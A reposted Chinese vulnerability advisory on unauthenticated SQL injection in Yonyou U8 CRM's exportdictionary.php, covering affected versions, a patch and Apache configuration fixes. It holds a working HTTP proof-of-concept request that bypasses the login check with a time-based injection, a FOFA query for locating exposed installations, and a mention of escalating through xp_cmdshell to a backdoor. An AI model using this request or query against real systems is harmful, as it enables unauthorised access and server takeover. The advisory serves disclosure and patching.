当前位置: 首页> 教育> 锐评 > 用友U8-CRM-exportdictionarySQL注入

用友U8-CRM-exportdictionarySQL注入

时间:2025/7/9 17:02:08来源:https://blog.csdn.net/weixin_45790890/article/details/142184130 浏览次数:0次

0 免责声明

请注意,使用本文章提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。

1 漏洞名称

用友U8-CRM-exportdictionary-sql注入

产品介绍

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

3 漏洞威胁


用友 U8 CRM客户关系管理系统 exportdictionary.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

影响范围:

V16.1, V16.0, V15.1, V15.0, V13

漏洞环境 

FOFA:

title="用友U8CRM"

 

漏洞复现

PoC

GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Connection: close

 

sqlmap验证

 

6 修复建议


第一步:在配置文件尾部追加如下段落即可

配置文件: U8SOFT\turbocrm70\apache\conf\httpd.conf,

在末尾添加一个配置:

Require local

其中,需要将中的u8安装路径修改为正确的安装路径

第二步:U8CRM存在SQL注入漏洞的安全补丁240828.zip

将解压文件中的U8SOFT目录覆盖产品安装目录。

第三步:修改完之后重启Apache4TurboCRM70服务

 

 

 

关键字:用友U8-CRM-exportdictionarySQL注入

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: